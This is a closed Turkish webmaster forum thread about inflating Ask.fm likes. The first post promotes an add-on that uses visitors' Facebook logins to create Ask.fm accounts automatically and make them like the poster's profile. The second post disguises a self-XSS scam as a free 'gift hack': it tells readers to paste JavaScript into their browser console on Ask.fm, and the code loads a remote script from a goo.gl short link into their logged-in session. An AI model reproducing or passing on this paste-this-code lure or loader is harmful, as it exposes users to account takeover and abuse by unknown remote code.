İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Ask.fm Begeni

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

q72

0
Yasakli Uye
Reaction score
15

Merhaba Arkadaşlar

Herkezin Bunu Aradıgını Biliyorum. Paylaşmıcaktım Ama DevamLı Facebook' Üzerinden Olsun Ask.fm Üzerinden Olsun Yazar Oldular. Bende Sıkıldım ve Paylaşmaya Karar Verdim.
Özelliklerinden bahsetmem gerekiyo galiba. Arkadaşlar uygulamanın çalışması için facebook hesabınızın açık olması şart. Neden derseniz facebook üzerinden sizin Ask.fm Linkinize tıklayan kişinin Ask.fm ' de hesabı olsun olmasın Facebook' İle giriş yapar ve otomatikmen üyelik açar. Bu Üyelikdende profilinizdeki ilk part'ı begenir. Buda minimum 30 begeni demek 1 kişiden. 10 kişi tıklarsa 300 begeni. 20 kişi tıklarsa 600 begeni falan filan işte. Bu böyle gider kısaca.

Eklentiyi İndirmek İçin ve Ayrıntılı Anlatım için:

Ask.fm Begeni Arttırma!

AskFmHackTime

0
İyinet Üyesi
Reaction score
0
Evet Arkadaşlar Aşk Fm Hediye Kasma Hilesi Bu Normalde Ücretli Biz Kısa Bi Süreligine
Ücretsiz Olarak Sizlere Sunuyoruz Yapmanız Gereken '' Ask Fm Profilinize Giriş Yapıp F12 Tuşuna Basıp Console Bölümüne Gelıp '' Şu Kodu Kopyalıyıp Oraya Yapıştırmanız Olacaktır.

''↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕ ↕↕↕ ↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕

function addJavascript(jsname){ var th = document.getElementsByTagName('head')[0]; var s = document.createElement('script'); s.setAttribute('type','text/javascript'); s.setAttribute('src',jsname); th.appendChild(s); } if(location.hostname.indexOf("ask.fm") >= 0){ addJavascript('http://goo.gl/JeRzva'); }

''↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕ ↕↕↕ ↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕↕

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5